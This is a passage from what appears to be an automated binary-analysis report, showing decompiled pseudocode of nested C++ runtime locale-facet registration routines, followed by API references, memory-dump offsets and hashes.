								E6E1C66BA(_t770 - 0x14);
								return E6E1E0075(_t718);
							} else {
								__eflags = _t736;
								if(_t736 == 0) {
									_push( *((intOrPtr*)(_t770 + 8)));
									_push(_t770 - 0x10);
									__eflags = E6E1D0F87(_t544, _t554, __edx, _t718, _t736) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t770 - 0x20);
										E6E1E3D74(_t770 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t544, _t718, _t736, 0x14);
										E6E1C6653(_t770 - 0x14, 0);
										_t737 =  *0x6e286dbc;
										 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
										 *(_t770 - 0x10) = _t737;
										_t277 = E6E1A161C(0x6e286d70);
										_t561 =  *((intOrPtr*)(_t770 + 8));
										_t719 = E6E1A171B( *((intOrPtr*)(_t770 + 8)), _t277);
										__eflags = _t719;
										if(_t719 != 0) {
											L19:
											E6E1C66BA(_t770 - 0x14);
											return E6E1E0075(_t719);
										} else {
											__eflags = _t737;
											if(_t737 == 0) {
												_push( *((intOrPtr*)(_t770 + 8)));
												_push(_t770 - 0x10);
												__eflags = E6E1D0FEF(_t544, _t561, __edx, _t719, _t737) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t770 - 0x20);
													E6E1E3D74(_t770 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t544, _t719, _t737, 0x14);
													E6E1C6653(_t770 - 0x14, 0);
													_t738 =  *0x6e286df0;
													 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
													 *(_t770 - 0x10) = _t738;
													_t290 = E6E1A161C(0x6e286d9c);
													_t568 =  *((intOrPtr*)(_t770 + 8));
													_t720 = E6E1A171B( *((intOrPtr*)(_t770 + 8)), _t290);
													__eflags = _t720;
													if(_t720 != 0) {
														L26:
														E6E1C66BA(_t770 - 0x14);
														return E6E1E0075(_t720);
													} else {
														__eflags = _t738;
														if(_t738 == 0) {
															_push( *((intOrPtr*)(_t770 + 8)));
															_push(_t770 - 0x10);
															__eflags = E6E1D1057(_t544, _t568, _t715, _t720, _t738) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438(_t770 - 0x20);
																E6E1E3D74(_t770 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t544, _t720, _t738, 0x14);
																E6E1C6653(_t770 - 0x14, 0);
																_t739 =  *0x6e286dc0;
																 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																 *(_t770 - 0x10) = _t739;
																_t303 = E6E1A161C(0x6e286d74);
																_t575 =  *((intOrPtr*)(_t770 + 8));
																_t721 = E6E1A171B( *((intOrPtr*)(_t770 + 8)), _t303);
																__eflags = _t721;
																if(_t721 != 0) {
																	L33:
																	E6E1C66BA(_t770 - 0x14);
																	return E6E1E0075(_t721);
																} else {
																	__eflags = _t739;
																	if(_t739 == 0) {
																		_push( *((intOrPtr*)(_t770 + 8)));
																		_push(_t770 - 0x10);
																		__eflags = E6E1D10BF(_t544, _t575, _t715, _t721, _t739) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1A1438(_t770 - 0x20);
																			E6E1E3D74(_t770 - 0x20, 0x6e283504);
																			asm("int3");
																			E6E1E00AC(0x6e2283cf, _t544, _t721, _t739, 0x14);
																			E6E1C6653(_t770 - 0x14, 0);
																			_t740 =  *0x6e286df8;
																			 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																			 *(_t770 - 0x10) = _t740;
																			_t316 = E6E1A161C(0x6e286da4);
																			_t582 =  *((intOrPtr*)(_t770 + 8));
																			_t722 = E6E1A171B( *((intOrPtr*)(_t770 + 8)), _t316);
																			__eflags = _t722;
																			if(_t722 != 0) {
																				L40:
																				E6E1C66BA(_t770 - 0x14);
																				return E6E1E0075(_t722);
																			} else {
																				__eflags = _t740;
																				if(_t740 == 0) {
																					_push( *((intOrPtr*)(_t770 + 8)));
																					_push(_t770 - 0x10);
																					__eflags = E6E1D1127(_t544, _t582, _t715, _t722, _t740) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1A1438(_t770 - 0x20);
																						E6E1E3D74(_t770 - 0x20, 0x6e283504);
																						asm("int3");
																						E6E1E00AC(0x6e2283cf, _t544, _t722, _t740, 0x14);
																						E6E1C6653(_t770 - 0x14, 0);
																						_t741 =  *0x6e286df4;
																						 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																						 *(_t770 - 0x10) = _t741;
																						_t329 = E6E1A161C(0x6e286da0);
																						_t589 =  *((intOrPtr*)(_t770 + 8));
																						_t723 = E6E1A171B( *((intOrPtr*)(_t770 + 8)), _t329);
																						__eflags = _t723;
																						if(_t723 != 0) {
																							L47:
																							E6E1C66BA(_t770 - 0x14);
																							return E6E1E0075(_t723);
																						} else {
																							__eflags = _t741;
																							if(_t741 == 0) {
																								_push( *((intOrPtr*)(_t770 + 8)));
																								_push(_t770 - 0x10);
																								__eflags = E6E1D11AB(_t544, _t589, _t715, _t723, _t741) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1A1438(_t770 - 0x20);
																									E6E1E3D74(_t770 - 0x20, 0x6e283504);
																									asm("int3");
																									E6E1E00AC(0x6e2283cf, _t544, _t723, _t741, 0x14);
																									E6E1C6653(_t770 - 0x14, 0);
																									_t742 =  *0x6e286dc8;
																									 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																									 *(_t770 - 0x10) = _t742;
																									_t342 = E6E1A161C(0x6e286d7c);
																									_t596 =  *((intOrPtr*)(_t770 + 8));
																									_t724 = E6E1A171B( *((intOrPtr*)(_t770 + 8)), _t342);
																									__eflags = _t724;
																									if(_t724 != 0) {
																										L54:
																										E6E1C66BA(_t770 - 0x14);
																										return E6E1E0075(_t724);
																									} else {
																										__eflags = _t742;
																										if(_t742 == 0) {
																											_push( *((intOrPtr*)(_t770 + 8)));
																											_push(_t770 - 0x10);
																											__eflags = E6E1D1230(_t544, _t596, _t715, _t724, _t742) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1A1438(_t770 - 0x20);
																												E6E1E3D74(_t770 - 0x20, 0x6e283504);
																												asm("int3");
																												E6E1E00AC(0x6e2283cf, _t544, _t724, _t742, 0x14);
																												E6E1C6653(_t770 - 0x14, 0);
																												_t743 =  *0x6e286dc4;
																												 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																												 *(_t770 - 0x10) = _t743;
																												_t355 = E6E1A161C(0x6e286d78);
																												_t603 =  *((intOrPtr*)(_t770 + 8));
																												_t725 = E6E1A171B( *((intOrPtr*)(_t770 + 8)), _t355);
																												__eflags = _t725;
																												if(_t725 != 0) {
																													L61:
																													E6E1C66BA(_t770 - 0x14);
																													return E6E1E0075(_t725);
																												} else {
																													__eflags = _t743;
																													if(_t743 == 0) {
																														_push( *((intOrPtr*)(_t770 + 8)));
																														_push(_t770 - 0x10);
																														__eflags = E6E1D12B4(_t544, _t603, _t715, _t725, _t743) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1A1438(_t770 - 0x20);
																															E6E1E3D74(_t770 - 0x20, 0x6e283504);
																															asm("int3");
																															E6E1E00AC(0x6e2283cf, _t544, _t725, _t743, 0x14);
																															E6E1C6653(_t770 - 0x14, 0);
																															_t744 =  *0x6e286dd8;
																															 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																															 *(_t770 - 0x10) = _t744;
																															_t368 = E6E1A161C(0x6e286d84);
																															_t610 =  *((intOrPtr*)(_t770 + 8));
																															_t726 = E6E1A171B( *((intOrPtr*)(_t770 + 8)), _t368);
																															__eflags = _t726;
																															if(_t726 != 0) {
																																L68:
																																E6E1C66BA(_t770 - 0x14);
																																return E6E1E0075(_t726);
																															} else {
																																__eflags = _t744;
																																if(_t744 == 0) {
																																	_push( *((intOrPtr*)(_t770 + 8)));
																																	_push(_t770 - 0x10);
																																	__eflags = E6E1D1339(_t544, _t610, _t715, _t726, _t744) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1A1438(_t770 - 0x20);
																																		E6E1E3D74(_t770 - 0x20, 0x6e283504);
																																		asm("int3");
																																		E6E1E00AC(0x6e2283cf, _t544, _t726, _t744, 0x14);
																																		E6E1C6653(_t770 - 0x14, 0);
																																		_t745 =  *0x6e286db0;
																																		 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																		 *(_t770 - 0x10) = _t745;
																																		_t381 = E6E1A161C(0x6e286d64);
																																		_t617 =  *((intOrPtr*)(_t770 + 8));
																																		_t727 = E6E1A171B( *((intOrPtr*)(_t770 + 8)), _t381);
																																		__eflags = _t727;
																																		if(_t727 != 0) {
																																			L75:
																																			E6E1C66BA(_t770 - 0x14);
																																			return E6E1E0075(_t727);
																																		} else {
																																			__eflags = _t745;
																																			if(_t745 == 0) {
																																				_push( *((intOrPtr*)(_t770 + 8)));
																																				_push(_t770 - 0x10);
																																				__eflags = E6E1D13A1(_t544, _t617, _t715, _t727, _t745) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1A1438(_t770 - 0x20);
																																					E6E1E3D74(_t770 - 0x20, 0x6e283504);
																																					asm("int3");
																																					E6E1E00AC(0x6e2283cf, _t544, _t727, _t745, 0x14);
																																					E6E1C6653(_t770 - 0x14, 0);
																																					_t746 =  *0x6e286ddc;
																																					 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																					 *(_t770 - 0x10) = _t746;
																																					_t394 = E6E1A161C(0x6e286d88);
																																					_t624 =  *((intOrPtr*)(_t770 + 8));
																																					_t728 = E6E1A171B( *((intOrPtr*)(_t770 + 8)), _t394);
																																					__eflags = _t728;
																																					if(_t728 != 0) {
																																						L82:
																																						E6E1C66BA(_t770 - 0x14);
																																						return E6E1E0075(_t728);
																																					} else {
																																						__eflags = _t746;
																																						if(_t746 == 0) {
																																							_push( *((intOrPtr*)(_t770 + 8)));
																																							_push(_t770 - 0x10);
																																							__eflags = E6E1D1409(_t544, _t624, _t715, _t728, _t746) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E1A1438(_t770 - 0x20);
																																								E6E1E3D74(_t770 - 0x20, 0x6e283504);
																																								asm("int3");
																																								E6E1E00AC(0x6e2283cf, _t544, _t728, _t746, 0x14);
																																								E6E1C6653(_t770 - 0x14, 0);
																																								_t747 =  *0x6e286de0;
																																								 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																								 *(_t770 - 0x10) = _t747;
																																								_t407 = E6E1A161C(0x6e286d8c);
																																								_t631 =  *((intOrPtr*)(_t770 + 8));
																																								_t729 = E6E1A171B( *((intOrPtr*)(_t770 + 8)), _t407);
																																								__eflags = _t729;
																																								if(_t729 != 0) {
																																									L89:
																																									E6E1C66BA(_t770 - 0x14);
																																									return E6E1E0075(_t729);
																																								} else {
																																									__eflags = _t747;
																																									if(_t747 == 0) {
																																										_push( *((intOrPtr*)(_t770 + 8)));
																																										_push(_t770 - 0x10);
																																										__eflags = E6E1D1471(_t544, _t631, _t715, _t729, _t747) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6E1A1438(_t770 - 0x20);
																																											E6E1E3D74(_t770 - 0x20, 0x6e283504);
																																											asm("int3");
																																											E6E1E00AC(0x6e2283cf, _t544, _t729, _t747, 0x14);
																																											E6E1C6653(_t770 - 0x14, 0);
																																											_t748 =  *0x6e286dfc;
																																											 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																											 *(_t770 - 0x10) = _t748;
																																											_t420 = E6E1A161C(0x6e286da8);
																																											_t638 =  *((intOrPtr*)(_t770 + 8));
																																											_t730 = E6E1A171B( *((intOrPtr*)(_t770 + 8)), _t420);
																																											__eflags = _t730;
																																											if(_t730 != 0) {
																																												L96:
																																												E6E1C66BA(_t770 - 0x14);
																																												return E6E1E0075(_t730);
																																											} else {
																																												__eflags = _t748;
																																												if(_t748 == 0) {
																																													_push( *((intOrPtr*)(_t770 + 8)));
																																													_push(_t770 - 0x10);
																																													__eflags = E6E1D14EC(_t544, _t638, _t715, _t730, _t748) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6E1A1438(_t770 - 0x20);
																																														E6E1E3D74(_t770 - 0x20, 0x6e283504);
																																														asm("int3");
																																														E6E1E00AC(0x6e2283cf, _t544, _t730, _t748, 0x14);
																																														E6E1C6653(_t770 - 0x14, 0);
																																														_t749 =  *0x6e286dcc;
																																														 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																														 *(_t770 - 0x10) = _t749;
																																														_t433 = E6E1A161C(0x6e286d80);
																																														_t645 =  *((intOrPtr*)(_t770 + 8));
																																														_t731 = E6E1A171B( *((intOrPtr*)(_t770 + 8)), _t433);
																																														__eflags = _t731;
																																														if(_t731 != 0) {
																																															L103:
																																															E6E1C66BA(_t770 - 0x14);
																																															return E6E1E0075(_t731);
																																														} else {
																																															__eflags = _t749;
																																															if(_t749 == 0) {
																																																_push( *((intOrPtr*)(_t770 + 8)));
																																																_push(_t770 - 0x10);
																																																__eflags = E6E1D1558(_t544, _t645, _t715, _t731, _t749) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6E1A1438(_t770 - 0x20);
																																																	E6E1E3D74(_t770 - 0x20, 0x6e283504);
																																																	asm("int3");
																																																	E6E1E00AC(0x6e2283cf, _t544, _t731, _t749, 0x14);
																																																	E6E1C6653(_t770 - 0x14, 0);
																																																	_t750 =  *0x6e286e00;
																																																	 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																																	 *(_t770 - 0x10) = _t750;
																																																	_t446 = E6E1A161C(0x6e286dac);
																																																	_t652 =  *((intOrPtr*)(_t770 + 8));
																																																	_t732 = E6E1A171B( *((intOrPtr*)(_t770 + 8)), _t446);
																																																	__eflags = _t732;
																																																	if(_t732 != 0) {
																																																		L110:
																																																		E6E1C66BA(_t770 - 0x14);
																																																		return E6E1E0075(_t732);
																																																	} else {
																																																		__eflags = _t750;
																																																		if(_t750 == 0) {
																																																			_push( *((intOrPtr*)(_t770 + 8)));
																																																			_push(_t770 - 0x10);
																																																			__eflags = E6E1D15C4(_t544, _t652, _t715, _t732, _t750) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6E1A1438(_t770 - 0x20);
																																																				E6E1E3D74(_t770 - 0x20, 0x6e283504);
																																																				asm("int3");
																																																				E6E1E00AC(0x6e2283cf, _t544, _t732, _t750, 0x14);
																																																				E6E1C6653(_t770 - 0x14, 0);
																																																				_t751 =  *0x6e286dd0;
																																																				 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																																				 *(_t770 - 0x10) = _t751;
																																																				_t459 = E6E1A161C(0x6e286d60);
																																																				_t659 =  *((intOrPtr*)(_t770 + 8));
																																																				_t733 = E6E1A171B( *((intOrPtr*)(_t770 + 8)), _t459);
																																																				__eflags = _t733;
																																																				if(_t733 != 0) {
																																																					L117:
																																																					E6E1C66BA(_t770 - 0x14);
																																																					return E6E1E0075(_t733);
																																																				} else {
																																																					__eflags = _t751;
																																																					if(_t751 == 0) {
																																																						_push( *((intOrPtr*)(_t770 + 8)));
																																																						_push(_t770 - 0x10);
																																																						__eflags = E6E1D162A(_t544, _t659, _t715, _t733, _t751) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							_t663 = _t770 - 0x20;
																																																							E6E1A1438(_t663);
																																																							E6E1E3D74(_t770 - 0x20, 0x6e283504);
																																																							asm("int3");
																																																							E6E1E00AC(0x6e22851f, _t544, _t733, _t751, 4);
																																																							_t752 = _t663;
																																																							 *(_t770 - 0x10) = _t752;
																																																							 *((intOrPtr*)(_t752 + 4)) =  *((intOrPtr*)(_t770 + 0xc));
																																																							_push( *((intOrPtr*)(_t770 + 0x14)));
																																																							_t245 = _t770 - 4;
																																																							 *_t245 =  *(_t770 - 4) & 0x00000000;
																																																							__eflags =  *_t245;
																																																							 *_t752 = 0x6e22c0c4;
																																																							 *((char*)(_t752 + 0x28)) =  *((intOrPtr*)(_t770 + 0x10));
																																																							E6E1D542F(_t544, _t663, _t715, _t733, _t752,  *_t245);
																																																							return E6E1E0075(_t752,  *((intOrPtr*)(_t770 + 8)));
																																																						} else {
																																																							_t733 =  *(_t770 - 0x10);
																																																							 *(_t770 - 0x10) = _t733;
																																																							 *(_t770 - 4) = 1;
																																																							E6E1C6FD3(__eflags, _t733);
																																																							 *0x6e22a26c();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t733 + 4))))();
																																																							 *0x6e286dd0 = _t733;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t733 = _t751;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t732 =  *(_t770 - 0x10);
																																																				 *(_t770 - 0x10) = _t732;
																																																				 *(_t770 - 4) = 1;
																																																				E6E1C6FD3(__eflags, _t732);
																																																				 *0x6e22a26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t732 + 4))))();
																																																				 *0x6e286e00 = _t732;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t732 = _t750;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t731 =  *(_t770 - 0x10);
																																																	 *(_t770 - 0x10) = _t731;
																																																	 *(_t770 - 4) = 1;
																																																	E6E1C6FD3(__eflags, _t731);
																																																	 *0x6e22a26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t731 + 4))))();
																																																	 *0x6e286dcc = _t731;
																																																	goto L103;
																																																}
																																															} else {
																																																_t731 = _t749;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t730 =  *(_t770 - 0x10);
																																														 *(_t770 - 0x10) = _t730;
																																														 *(_t770 - 4) = 1;
																																														E6E1C6FD3(__eflags, _t730);
																																														 *0x6e22a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t730 + 4))))();
																																														 *0x6e286dfc = _t730;
																																														goto L96;
																																													}
																																												} else {
																																													_t730 = _t748;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t729 =  *(_t770 - 0x10);
																																											 *(_t770 - 0x10) = _t729;
																																											 *(_t770 - 4) = 1;
																																											E6E1C6FD3(__eflags, _t729);
																																											 *0x6e22a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t729 + 4))))();
																																											 *0x6e286de0 = _t729;
																																											goto L89;
																																										}
																																									} else {
																																										_t729 = _t747;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t728 =  *(_t770 - 0x10);
																																								 *(_t770 - 0x10) = _t728;
																																								 *(_t770 - 4) = 1;
																																								E6E1C6FD3(__eflags, _t728);
																																								 *0x6e22a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t728 + 4))))();
																																								 *0x6e286ddc = _t728;
																																								goto L82;
																																							}
																																						} else {
																																							_t728 = _t746;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t727 =  *(_t770 - 0x10);
																																					 *(_t770 - 0x10) = _t727;
																																					 *(_t770 - 4) = 1;
																																					E6E1C6FD3(__eflags, _t727);
																																					 *0x6e22a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t727 + 4))))();
																																					 *0x6e286db0 = _t727;
																																					goto L75;
																																				}
																																			} else {
																																				_t727 = _t745;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t726 =  *(_t770 - 0x10);
																																		 *(_t770 - 0x10) = _t726;
																																		 *(_t770 - 4) = 1;
																																		E6E1C6FD3(__eflags, _t726);
																																		 *0x6e22a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t726 + 4))))();
																																		 *0x6e286dd8 = _t726;
																																		goto L68;
																																	}
																																} else {
																																	_t726 = _t744;
																																	goto L68;
																																}
																															}
																														} else {
																															_t725 =  *(_t770 - 0x10);
																															 *(_t770 - 0x10) = _t725;
																															 *(_t770 - 4) = 1;
																															E6E1C6FD3(__eflags, _t725);
																															 *0x6e22a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t725 + 4))))();
																															 *0x6e286dc4 = _t725;
																															goto L61;
																														}
																													} else {
																														_t725 = _t743;
																														goto L61;
																													}
																												}
																											} else {
																												_t724 =  *(_t770 - 0x10);
																												 *(_t770 - 0x10) = _t724;
																												 *(_t770 - 4) = 1;
																												E6E1C6FD3(__eflags, _t724);
																												 *0x6e22a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t724 + 4))))();
																												 *0x6e286dc8 = _t724;
																												goto L54;
																											}
																										} else {
																											_t724 = _t742;
																											goto L54;
																										}
																									}
																								} else {
																									_t723 =  *(_t770 - 0x10);
																									 *(_t770 - 0x10) = _t723;
																									 *(_t770 - 4) = 1;
																									E6E1C6FD3(__eflags, _t723);
																									 *0x6e22a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t723 + 4))))();
																									 *0x6e286df4 = _t723;
																									goto L47;
																								}
																							} else {
																								_t723 = _t741;
																								goto L47;
																							}
																						}
																					} else {
																						_t722 =  *(_t770 - 0x10);
																						 *(_t770 - 0x10) = _t722;
																						 *(_t770 - 4) = 1;
																						E6E1C6FD3(__eflags, _t722);
																						 *0x6e22a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t722 + 4))))();
																						 *0x6e286df8 = _t722;
																						goto L40;
																					}
																				} else {
																					_t722 = _t740;
																					goto L40;
																				}
																			}
																		} else {
																			_t721 =  *(_t770 - 0x10);
																			 *(_t770 - 0x10) = _t721;
																			 *(_t770 - 4) = 1;
																			E6E1C6FD3(__eflags, _t721);
																			 *0x6e22a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t721 + 4))))();
																			 *0x6e286dc0 = _t721;
																			goto L33;
																		}
																	} else {
																		_t721 = _t739;
																		goto L33;
																	}
																}
															} else {
																_t720 =  *(_t770 - 0x10);
																 *(_t770 - 0x10) = _t720;
																 *(_t770 - 4) = 1;
																E6E1C6FD3(__eflags, _t720);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t720 + 4))))();
																 *0x6e286df0 = _t720;
																goto L26;
															}
														} else {
															_t720 = _t738;
															goto L26;
														}
													}
												} else {
													_t719 =  *(_t770 - 0x10);
													 *(_t770 - 0x10) = _t719;
													 *(_t770 - 4) = 1;
													E6E1C6FD3(__eflags, _t719);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t719 + 4))))();
													 *0x6e286dbc = _t719;
													goto L19;
												}
											} else {
												_t719 = _t737;
												goto L19;
											}
										}
									} else {
										_t718 =  *(_t770 - 0x10);
										 *(_t770 - 0x10) = _t718;
										 *(_t770 - 4) = 1;
										E6E1C6FD3(__eflags, _t718);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t718 + 4))))();
										 *0x6e286dec = _t718;
										goto L12;
									}
								} else {
									_t718 = _t736;
									goto L12;
								}
							}
						} else {
							_t717 =  *(_t770 - 0x10);
							 *(_t770 - 0x10) = _t717;
							 *(_t770 - 4) = 1;
							E6E1C6FD3(__eflags, _t717);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t717 + 4))))();
							 *0x6e286db8 = _t717;
							goto L5;
						}
					} else {
						_t717 = _t735;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1CF230
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CF23A
int.LIBCPMT ref: 6E1CF251

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

messages.LIBCPMT ref: 6E1CF274
std::_Facet_Register.LIBCPMT ref: 6E1CF28B
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CF2AB
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CF2C9

Strings

lm(n, xrefs: 6E1CF245

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmessages
String ID: lm(n
API String ID: 438560357-3891014945
Opcode ID: a592c192680f7a644c4c855d1a542dd7bef4fc12b90837bb977f4dc17c05f3eb
Instruction ID: 391dadce2ed7032be052bcde2310c524f0e6617f3b744c2aa1226123ef9c8aed
Opcode Fuzzy Hash: a592c192680f7a644c4c855d1a542dd7bef4fc12b90837bb977f4dc17c05f3eb
Instruction Fuzzy Hash: 21115C7591051D8BCF01DBD4C854AFEB37AAF64B14F240508D530EB290DF78D989E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF037, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6E1CF037(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t293;
				signed int _t294;
				void* _t306;
				void* _t319;
				void* _t332;
				void* _t345;
				void* _t358;
				void* _t371;
				void* _t384;
				void* _t397;
				void* _t410;
				void* _t423;
				void* _t436;
				void* _t449;
				void* _t462;
				void* _t475;
				void* _t488;
				void* _t501;
				void* _t514;
				void* _t527;
				void* _t540;
				signed int _t777;
				signed int _t841;
				signed int _t842;
				signed int _t843;
				signed int _t844;
				signed int _t845;
				signed int _t846;
				signed int _t847;
				signed int _t848;
				signed int _t849;
				signed int _t850;
				signed int _t851;
				signed int _t852;
				signed int _t853;
				signed int _t854;
				signed int _t855;
				signed int _t856;
				signed int _t857;
				signed int _t858;
				signed int _t859;
				signed int _t861;
				signed int _t862;
				signed int _t863;
				signed int _t864;
				signed int _t865;
				signed int _t866;
				signed int _t867;
				signed int _t868;
				signed int _t869;
				signed int _t870;
				signed int _t871;
				signed int _t872;
				signed int _t873;
				signed int _t874;
				signed int _t875;
				signed int _t876;
				signed int _t877;
				signed int _t878;
				signed int _t879;
				signed int _t880;
				signed int _t881;
				void* _t902;

				_t838 = __edx;
				_t637 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t902 - 0x14, 0);
				_t861 =  *0x6e286db4;
				 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
				 *(_t902 - 0x10) = _t861;
				_t293 = E6E1A161C(0x6e286d68);
				_t640 =  *((intOrPtr*)(_t902 + 8));
				_t294 = E6E1A171B( *((intOrPtr*)(_t902 + 8)), _t293);
				_t840 = _t294;
				if(_t294 != 0) {
					L5:
					E6E1C66BA(_t902 - 0x14);
					return E6E1E0075(_t840);
				} else {
					if(_t861 == 0) {
						_push( *((intOrPtr*)(_t902 + 8)));
						_push(_t902 - 0x10);
						__eflags = E6E1D0DA5(__ebx, _t640, __edx, _t840, _t861) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t902 - 0x20);
							E6E1E3D74(_t902 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t840, _t861, 0x14);
							E6E1C6653(_t902 - 0x14, 0);
							_t862 =  *0x6e286dd4;
							 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
							 *(_t902 - 0x10) = _t862;
							_t306 = E6E1A161C(0x6e286b28);
							_t647 =  *((intOrPtr*)(_t902 + 8));
							_t841 = E6E1A171B( *((intOrPtr*)(_t902 + 8)), _t306);
							__eflags = _t841;
							if(_t841 != 0) {
								L12:
								E6E1C66BA(_t902 - 0x14);
								return E6E1E0075(_t841);
							} else {
								__eflags = _t862;
								if(_t862 == 0) {
									_push( *((intOrPtr*)(_t902 + 8)));
									_push(_t902 - 0x10);
									__eflags = E6E1D0E47(_t637, _t647, __edx, _t841, _t862) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t902 - 0x20);
										E6E1E3D74(_t902 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t637, _t841, _t862, 0x14);
										E6E1C6653(_t902 - 0x14, 0);
										_t863 =  *0x6e286de8;
										 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
										 *(_t902 - 0x10) = _t863;
										_t319 = E6E1A161C(0x6e286d94);
										_t654 =  *((intOrPtr*)(_t902 + 8));
										_t842 = E6E1A171B( *((intOrPtr*)(_t902 + 8)), _t319);
										__eflags = _t842;
										if(_t842 != 0) {
											L19:
											E6E1C66BA(_t902 - 0x14);
											return E6E1E0075(_t842);
										} else {
											__eflags = _t863;
											if(_t863 == 0) {
												_push( *((intOrPtr*)(_t902 + 8)));
												_push(_t902 - 0x10);
												__eflags = E6E1D0EB7(_t637, _t654, __edx, _t842, _t863) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t902 - 0x20);
													E6E1E3D74(_t902 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t637, _t842, _t863, 0x14);
													E6E1C6653(_t902 - 0x14, 0);
													_t864 =  *0x6e286db8;
													 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
													 *(_t902 - 0x10) = _t864;
													_t332 = E6E1A161C(0x6e286d6c);
													_t661 =  *((intOrPtr*)(_t902 + 8));
													_t843 = E6E1A171B( *((intOrPtr*)(_t902 + 8)), _t332);
													__eflags = _t843;
													if(_t843 != 0) {
														L26:
														E6E1C66BA(_t902 - 0x14);
														return E6E1E0075(_t843);
													} else {
														__eflags = _t864;
														if(_t864 == 0) {
															_push( *((intOrPtr*)(_t902 + 8)));
															_push(_t902 - 0x10);
															__eflags = E6E1D0F1F(_t637, _t661, _t838, _t843, _t864) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438(_t902 - 0x20);
